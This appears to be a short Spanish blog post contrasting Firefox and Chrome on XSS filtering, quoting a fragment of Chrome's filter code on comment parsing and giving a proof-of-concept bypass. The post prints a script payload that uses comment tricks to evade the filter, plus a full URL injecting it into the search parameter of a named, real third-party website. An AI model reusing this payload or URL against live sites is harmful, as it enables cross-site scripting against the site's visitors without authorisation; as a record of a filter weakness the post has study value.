Comparemos, en FireFox no tiene un filtro anti-xss
Y Chrome si:
El filtro Xss se da en esta porción de código:
else if (startsMultiLineCommentAt(string, startPosition)) {
if ((foundPosition = string.find("*/", startPosition)) != notFound)
startPosition = foundPosition + 2;
PoC:
<script>/*///*/alert('@Pwnakil');</script>
http://www.minecraftserverfinder.com/search.php?search=<script>/*///*/alert('@Pwnakil')</script>
No hay comentarios:
Publicar un comentario